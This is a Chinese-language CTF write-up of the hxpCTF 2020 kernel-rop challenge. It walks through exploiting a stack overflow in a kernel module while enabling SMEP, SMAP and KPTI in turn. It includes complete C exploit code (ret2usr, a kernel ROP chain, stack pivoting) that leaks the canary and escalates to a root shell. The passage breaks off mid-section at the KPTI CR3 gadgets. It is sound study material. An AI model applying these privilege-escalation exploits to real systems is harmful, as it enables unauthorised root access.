逐步绕过smep smap kaslr kpti —— hxpctf2020 kernel-rop

从笔记里发现2021年写的一篇writeup,题目是hxpctf2020 kernel-rop,应该是参考某个老外的博客,逐步打开smep smap kaslr kpti来进行一个内核栈溢出漏洞的exploit练习。

参考Reference

https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/
https://elixir.bootlin.com/linux/v5.9-rc6/source
Linux KASLR机制详解
Kernel address space layout randomization (KASLR)
Function Granular KASLR
stackoverflow - what is __ksymtab? in linux kernel

题目环境

hxpCTF-2020 kernel-rop

题目的qemu启动脚本:

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "console=ttyS0 kaslr kpti=1 quiet panic=1"

原题中开启了 smep、smap、kaslr、kpti四种保护机制。这里修改启动脚本,将它们一个一个开启,逐步绕过去进行利用。

漏洞分析

init:创建了/dev/hackme杂项设备

1
2
3
4
5
6
7
8
int __cdecl hackme_init()
{
__int64 v0; // rdi
__int64 v1; // rsi

_fentry__(v0, v1);
return misc_register(&hackme_misc); // /dev/hackme
}

read:

0x1000-32范围内的栈溢出读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
unsigned __int64 size_1; // rdx
unsigned __int64 size_2; // rbx
bool v6; // zf
ssize_t result; // rax
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v9; // [rsp+80h] [rbp-20h]

_fentry__(f, data);
size_2 = size_1;
v9 = __readgsqword(0x28u);
_memcpy(hackme_buf, tmp, size_1);
if ( size_2 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, size_2);
BUG();
}
_check_object_size(hackme_buf, size_2, 1LL);
v6 = copy_to_user(data, hackme_buf, size_2) == 0;// out of bound read
result = -14LL;
if ( v6 )
return size_2;
return result;
}

write:

0x1000-32范围内的栈溢出写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
unsigned __int64 size_1; // rdx
ssize_t size_2; // rbx
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v8; // [rsp+80h] [rbp-20h]

_fentry__(f, data);
size_2 = size_1;
v8 = __readgsqword(0x28u);
if ( size_1 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, size_1);
BUG();
}
_check_object_size(hackme_buf, size_1, 0LL);
if ( copy_from_user(hackme_buf, data, size_2) )
return -14LL;
_memcpy(tmp, hackme_buf, size_2); // stack overflow write
return size_2;
}

开启了栈保护:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
.text.hackme_write:0000000000000020                 call    __fentry__
.text.hackme_write:0000000000000025 push rbp
.text.hackme_write:0000000000000026 mov rbp, rsp
.text.hackme_write:0000000000000029 push r12
.text.hackme_write:000000000000002B push rbx
.text.hackme_write:000000000000002C mov rbx, size
.text.hackme_write:000000000000002F sub rsp, 88h
.text.hackme_write:0000000000000036 mov rax, gs:28h
.text.hackme_write:000000000000003F mov [rbp-18h], rax
....
.text.hackme_write:0000000000000092 mov rcx, [rbp-18h]
.text.hackme_write:0000000000000096 xor rcx, gs:28h
.text.hackme_write:000000000000009F jnz short loc_C9 ; canary校验失败分支
.text.hackme_write:00000000000000A1 add rsp, 88h
.text.hackme_write:00000000000000A8 pop rbx
.text.hackme_write:00000000000000A9 pop data
.text.hackme_write:00000000000000AB pop rbp
.text.hackme_write:00000000000000AC retn

调试

修改文件系统中的init脚本,将 /proc/kallsyms复制到根目录下,因为非root用户直接读取/proc/kallsyms时所有的符号地址都是0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh

/bin/busybox --install -s

stty raw -echo

chown -R 0:0 /

mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp && mount -t tmpfs tmpfs /tmp

insmod /hackme.ko
chmod 666 /dev/hackme

echo 0 > /proc/sys/kernel/kptr_restrict
cp /proc/kallsyms /kallsyms
# echo 1 > /proc/sys/kernel/dmesg_restrict
# chmod 400 /proc/kallsyms

在qemu启动脚本中加-s选项,就可以从宿主机gdb中通过1234端口调试虚拟机的内核了。

文件系统解包脚本decompress.sh:

1
2
3
4
5
6
mkdir initramfs
cd initramfs
cp ../initramfs.cpio.gz .
gunzip ./initramfs.cpio.gz
cpio -idm < ./initramfs.cpio
rm initramfs.cpio

文件系统打包脚本compress.sh:

1
2
3
4
5
6
cd initramfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > initramfs.cpio.gz
mv ./initramfs.cpio.gz ../

Level1 ret2usr

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64, \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "nopti nokaslr console=ttyS0 quiet panic=1"

在启动脚本中把所有保护机制都关掉。这种情况下的利用就相当简单了。

  • exp开始时先保存此时的cs、ss、rsp、rflags,后面从内核态返回用户态时使用

  • read()溢出,泄露栈上的canary

  • write()溢出,覆盖栈上的返回地址和canary

  • 在用户空间布置commit_creds(prepare_kernel_cred(0))的内核函数调用

    由于没有开启kaslr,所以直接读kallsyms获取内核符号的地址即可:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    / $ cat ./kallsyms  | grep commit_cred
    ffffffff814c6410 T commit_creds
    ffffffff81f87d90 r __ksymtab_commit_creds
    ffffffff81fa0972 r __kstrtab_commit_creds
    ffffffff81fa4d42 r __kstrtabns_commit_creds
    / $ cat ./kallsyms | grep prepare_kernel_cred
    ffffffff814c67f0 T prepare_kernel_cred
    ffffffff81f8d4fc r __ksymtab_prepare_kernel_cred
    ffffffff81fa09b2 r __kstrtab_prepare_kernel_cred
    ffffffff81fa4d42 r __kstrtabns_prepare_kernel_cred
  • 返回用户态运行root shell

    内核态返回用户态时可以使用iretq指令,调用这条指令时的栈布局如下:

    1
    2
    3
    4
    5
    rsp ---> rip 
    cs
    rflags
    rsp
    ss

ret2usr完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;

void leak(void){
unsigned n = 20;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

unsigned long user_rip = (unsigned long)get_shell;

// commit_creds(prepare_kernel_cred(0)) 后返回用户态
void escalate_privs(void){
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;"
"call rax; mov rdi, rax;"
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = (unsigned long)escalate_privs; // ret

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

int main() {

save_state();

open_dev();

leak();

overflow();

puts("[!] Should never be reached");

return 0;
}

Level2 SMEP

修改run.sh,添加cpu的smep保护

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64, +smep\
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "nopti nokaslr console=ttyS0 quiet panic=1"

SMEP(Supervisor Mode Execution Prevention) ,由控制寄存器CR4的第20位控制开启。开启后,当CPU处于内核态时,如果去运行用户空间的代码,会触发进程错误。

在开启了smep后,再去运行ret2usr的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/ $ ./ret2usr
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: 717aa681e82dc400
[*] Prepared payload
[ 6.798083] unable to execute userspace code (SMEP?) (uid: 1000)
[ 6.799234] BUG: unable to handle page fault for address: 0000000000401fd9
[ 6.799547] #PF: supervisor instruction fetch in kernel mode
[ 6.799785] #PF: error_code(0x0011) - permissions violation
[ 6.800155] PGD 655c067 P4D 655c067 PUD 655d067 PMD 64f9067 PTE 2a62025
[ 6.800914] Oops: 0011 [#1] SMP NOPTI
[ 6.801413] CPU: 0 PID: 114 Comm: ret2usr Tainted: G O 5.9.0-rc6+ #10
[ 6.801709] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 6.802560] RIP: 0010:0x401fd9
[ 6.802746] Code: Bad RIP value.
[ 6.802923] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 6.803146] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 6.803392] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 6.803718] RBP: 0000000000000000 R08: 0000000000000000 R09: ffffc900001bfed8
[ 6.803952] R10: 0000000000000000 R11: ffffc900001bfed8 R12: 0000000000000000
[ 6.804173] R13: ffffc900001bfef0 R14: 00007ffddaf5a460 R15: ffff888006884000
[ 6.804518] FS: 00000000008de880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 6.804765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 6.805029] CR2: 0000000000401fd9 CR3: 0000000006492000 CR4: 00000000001006f0
[ 6.805472] Call Trace:
[ 6.806672] ? tty_write+0x210/0x370
[ 6.806850] ? security_file_permission+0x127/0x170
[ 6.807015] ? security_file_permission+0x127/0x170
[ 6.807262] Modules linked in: hackme(O)
[ 6.807758] CR2: 0000000000401fd9
[ 6.808374] ---[ end trace fe910e97161ede8c ]---
[ 6.808619] RIP: 0010:0x401fd9
[ 6.808721] Code: Bad RIP value.
[ 6.808842] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 6.809006] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 6.809216] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 6.809419] RBP: 0000000000000000 R08: 0000000000000000 R09: ffffc900001bfed8
[ 6.809627] R10: 0000000000000000 R11: ffffc900001bfed8 R12: 0000000000000000
[ 6.809836] R13: ffffc900001bfef0 R14: 00007ffddaf5a460 R15: ffff888006884000
[ 6.810036] FS: 00000000008de880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 6.810262] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 6.810424] CR2: 0000000000401fd9 CR3: 0000000006492000 CR4: 00000000001006f0
Killed

2.1 传统的smep绕过

由于smep是通过cr4寄存器来控制开启的,而这个寄存器在内核态是可以修改的,因此可以通过内核中mov cr4, rdi这样的gadget,将CR4的第20位置0将其关闭。而诸如此类的内核指令来自于一个内核函数native_write_cr4(),该函数将cr4置为参数指定的值

修改exp中的栈溢出payload,添加修改CR4的gadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long native_write_cr4 = 0xffffffff814443e0;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0x6f0;
payload[off++] = native_write_cr4; // native_write_cr4(0x6f0), clear the 20th bit
payload[off++] = (unsigned long)escalate_privs;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

但是这样运行后还是会触发同样的smep错误。通过在native_write_cr4下断点调试可以发现,函数一开始确实把cr4置为了参数的值,但是随后经过一系列的判断后,又重新将smep开启了:

native_write_cr4函数入口:

可以看到,一开始,确实是修改了cr4,将smep关闭,但是继续往下运行,该函数经过一些判断后,又重新将smep打开了:

而且在题目的vmlinux中也没有搜到类似于mov cr4, rdi; ret的gadget。

题目提供的内核版本是5.9.0-rc6+,查看这个函数的源码:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/kernel/cpu/common.c#L376

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
static DEFINE_STATIC_KEY_FALSE_RO(cr_pinning);
static unsigned long cr4_pinned_bits __ro_after_init;

...

void native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;

set_register:
asm volatile("mov %0,%%cr4": "+r" (val), "+m" (cr4_pinned_bits));

if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
#if IS_MODULE(CONFIG_LKDTM)
EXPORT_SYMBOL_GPL(native_write_cr4);
#endif

在dmesg中也可以看到代码中的log:

可以看到,内核似乎不允许我们在运行过程中去修改CR4中**cr4_pinned_mask**中的SMEP、SMAP位,当检测到CR4中这些需要固定的比特被更改时,就会重新将其置位

而在低版本的代码中(4.14.252为例https://elixir.bootlin.com/linux/v4.14.252/source/arch/x86/include/asm/special_insns.h#L75 ) ,则没有这样的限制,可以直接更改cr4:

1
2
3
4
static inline void native_write_cr4(unsigned long val)
{
asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}

https://patchwork.kernel.org/project/linux-hardening/patch/20190220180934.GA46255@beast/ 中可以找到补丁的说明,内核开发者已经意识到了这个函数gadget给漏洞利用中绕过smep、smap创造了便利,因此进行了上面的限制。

也可以看到,这个限制并不是严格的限制ROP,只是防止攻击者通过native_write_cr4()函数来关闭smep、smap,我个人理解,如果可以找到其他修改cr4的gadget,还是可以将它们关闭的。不过在这道题目的vmlinux中没有找到可利用的gadget,因此通过ROP关闭SMEP的传统方式在这里用不了。

2.2 完整的内核rop

这样的话,就不能把提权代码布置在用户态空间了,必须在内核ROP中完成提权代码commit_creds(prepare_kernel_cred(0))的调用用。

  • ROP运行prepare_kernel_cred(0)
  • 通过gadget将rax中的返回值移进rdi寄存器,继续ROP调用commit_creds()
  • ROP 到swapgs ; ret.
  • 堆栈设置为RIP|CS|RFLAGS|SP|SS,最后ROP到iretq

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;

void leak(void){
unsigned n = 20;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

unsigned long user_rip = (unsigned long)get_shell; // 返回用户态后起shell

unsigned long pop_rdi_ret = 0xffffffff81006370; // pop rdi; ret;
unsigned long native_write_cr4 = 0xffffffff814443e0; // 新版本不能关闭smep smap
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long push_rax_ret = 0xffffffff81006070; // push rax; ret; rop中不能用,相当于rax作为返回地址了
unsigned long mov_rdi_rax = 0xffffffff816bf203; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs; pop rbp; ret;
unsigned long iretq = 0xffffffff814381cb; // iretq; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
payload[off++] = 0;
payload[off++] = commit_creds;
payload[off++] = swapgs_pop1_ret;
payload[off++] = 0;
payload[off++] = iretq;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

int main() {

save_state();

open_dev();

leak();

overflow();

puts("[!] Should never be reached");

return 0;
}

2.3 栈迁移的ROP

上一小节中,在内核栈上进行了一个完整的ROP,显然这种ROP是需要攻击者能够控制较大范围的栈空间,而很多情况下,我们可能只能控制返回地址前后的有限长度,这时候就可以尝试进行栈迁移,将栈迁移到能控制的地方去,在SMAP没有开启的情况下,可以将栈迁移到EXP的用户态空间中,再布置ROP就不受payload长度的限制了。

在vmlinux中找到这样一条迁移栈的gadget:

1
2
0xffffffff8196f56a: mov esp, 0x5b000000; pop r12; pop rbp; ret;

0x5b000000mmap出来,然后在这上面布置ROP,需要注意的是,mmap的时候要把0x5b000000前面的一个页开始申请,因为在随后调用内核函数时,在函数中会抬升栈,而栈是像低地址扩展的。另外,需要在0x5b000000-0x1000处赋一个值,因为后面布置栈空间是在0x5b000000这个页做的,而用户态申请内存是有延迟分配的策略,如果不给0x5b000000-0x1000赋值,后面运行到内核函数中开辟栈时,会由于0x5b000000-0x1000这个内存页还没分配,导致一个double fault(exception处理过程中的exception)

0x5b000000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off1 = 16;
unsigned long *fake_stack = (unsigned long *)mmap((void *)0x5b000000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);

payload[off1++] = cookie;
payload[off1++] = 0x0; // rbx
payload[off1++] = 0x0; // r12
payload[off1++] = 0x0; // rbp
payload[off1++] = 0xffffffff8196f56a; // mov esp, 0x5b000000; pop r12; pop rbp; ret;

unsigned off2 = 0x1000 / 8;
fake_stack[0] = 0xdead; // put something in the first page to prevent fault
fake_stack[off2++] = 0x0; // dummy r12
fake_stack[off2++] = 0x0; // dummy rbp
fake_stack[off2++] = pop_rdi_ret; // return address
fake_stack[off2++] = 0;
fake_stack[off2++] = prepare_kernel_cred;
fake_stack[off2++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
fake_stack[off2++] = 0;
fake_stack[off2++] = commit_creds;
fake_stack[off2++] = swapgs_pop1_ret;
fake_stack[off2++] = 0;
fake_stack[off2++] = iretq;
fake_stack[off2++] = user_rip;
fake_stack[off2++] = user_cs;
fake_stack[off2++] = user_rflags;
fake_stack[off2++] = user_sp;
fake_stack[off2++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

Level3 KPTI

3.1 KPTI 内核页表隔离

https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/
https://zhuanlan.zhihu.com/p/137277724

KPTI,即Kernel Page Table Isolation内核页表隔离技术。开启了KPTI,用户空间和内核空间将使用隔离的两份页表,而不是使用同时包含用户和内核空间的一份页表。是用来解决由Intel x86 cpu漏洞导致的页表泄露问题的。

每个进程都有一套指向进程自身的页表,由CR3寄存器指向。

早期的Linux内核,每当执行用户空间代码(应用程序)时,Linux会在其进程页表中保留整个内核内存的映射(内核地址空间和用户地址空间共用一个页全局目录表PGD),并保护其访问。这样做的优点是当应用程序向内核发送系统调用或收到中断时,内核页表始终存在,可以避免绝大多数上下文切换相关的开销(TLB刷新、页表交换等)。

KPTI中每个进程有两套页表——内核态页表与用户态页表(两个地址空间)。内核态页表包含了用户空间和内核空间的地址映射(不过用户空间受SMAP和SMEP保护)。用户态页表只包含用户空间和一小部分内核空间的映射,这是由于涉及到上下文切换,所以在用户态页表中必须包含部分内核地址,用来建立中断入口、出口的映射。

当中断发生,从用户态陷入内核态时,就涉及到切换CR3寄存器,从用户态地址空间切换到内核态的地址空间。中断上半部的要求是尽可能的快,从而切换CR3这个操作也要求尽可能的快。为了达到这个目的,KPTI中将内核空间的PGD和用户空间的PGD放置在一个连续的8KB内存空间中(内核态在低位,用户态在高位)。这段空间必须是8K对齐的,这样将CR3的切换操作转换为将CR3值的第13位(由低到高)的置位或清零操作,提高了CR3切换的速度。

开启KPTI后,再想提权就比较有局限性,比如我们常用的直接ret2usr方式在KPTI下将成为过去时。

题目版本的内核系统调用入口源码:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_64.S#L95

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY

swapgs
/* tss.sp2 is scratch space. */
movq %rsp, PER_CPU_VAR(cpu_tss_rw + TSS_sp2)
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
...
...
...
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)

可以看到,在入口和结束的时候,分别运行了SWITCH_TO_KERNEL_CR4SWITCH_TO_USER_CR3_STACK宏,来进行CR3寄存器的切换。

https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_32.S#L165

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define PTI_SWITCH_MASK         (1 << PAGE_SHIFT)

...

.macro SWITCH_TO_KERNEL_CR3 scratch_reg:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI
movl %cr3, \scratch_reg
/* Test if we are already on kernel CR3 */
testl $PTI_SWITCH_MASK, \scratch_reg
jz .Lend_\@
andl $(~PTI_SWITCH_MASK), \scratch_reg
movl \scratch_reg, %cr3
/* Return original CR3 in \scratch_reg */
orl $PTI_SWITCH_MASK, \scratch_reg
.Lend_\@:
.endm

其中,$PTI_SWITCH_MASK = 1 << 12 , 因此,这个宏的作用就是简单的判断,CR3中寄存器的地址是不是内核页表的地址,这是判断其第13bit(由低到高)是否是0来确定的,如果不是,则将其置0,即切换到8k空间里的位于低4k的内核页表。

在这个版本的在线源码里我没找到SWITCH_TO_USER_CR3_STACK宏,但是可以找到SWITCH_TO_USER_CR3宏的定义:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_32.S#L134

1
2
3
4
5
6
7
8
9
10
11
#define PTI_SWITCH_MASK         (1 << PAGE_SHIFT)
..
/* Unconditionally switch to user cr3 */
.macro SWITCH_TO_USER_CR3 scratch_reg:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI

movl %cr3, \scratch_reg
orl $PTI_SWITCH_MASK, \scratch_reg
movl \scratch_reg, %cr3
.Lend_\@:
.endm

可以看到,在切换回用户态的页表时,也是简单的将CR3寄存器的第13bit置1实现的。

修改题目的qemu启动脚本,添加KPTI机制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "kpti=1 nokaslr console=ttyS0 quiet panic=1" \
-s

启动后再次运行level2中的exploit,发生了一个用户态的segmentation fault

1
2
3
4
5
6
7
8
/ $ ./smep2
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: 19d245c9d034ba00
[*] Prepared payload
Segmentation fault

显然,这是由于返回用户态前没有切换回用户态页表,导致运行用户态的第一条指令时,寻址时发生了段错误。

查看dmesg:

1
2
[    5.905184] smep2[113]: segfault at 401f72 ip 0000000000401f72 sp 00007ffc0f990cc0 error 15 in smep2[401000+96000]
[ 5.906710] Code: 09 00 b8 00 00 00 00 e8 ec f7 00 00 48 89 dc 90 48 8b 45 e8 64 48 33 04 25 28 00 00 00 74 05 e8 14 3b 05 00 48 8b 5d f8 c9 c3 <f3> 0f 1e fa 55 48 89 e5 48 8d 3d fb 50 09 00 e5

这是一个error 15的段错误,在https://utcc.utoronto.ca/~cks/space/blog/linux/KernelSegfaultErrorCodes 这里可以查到error 15的含义:

error 15: attempt to execute code from a mapped memory area that isn’t executable.

根据https://www.kernel.org/doc/html/latest/x86/pti.html 的说法“the user portion of the kernel page tables is crippled by setting the NX bit in the top level”可以知道,虽然内核页表也包括了用户空间的地址映射,但是将用户空间部分的都标记成了NX不可执行,因此会导致segmentation fault

3.2 恢复用户态页表

那么,要完成漏洞利用,正常返回用户态,就需要像上面内核代码所作的那样,切换回用户态前先将CR3寄存器切换成用户态页表,也就是 CR3 |= (1 << 12)

一开始,我构造了一些gadget用ROP来完成CR3 |= (1 << 12),如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
...
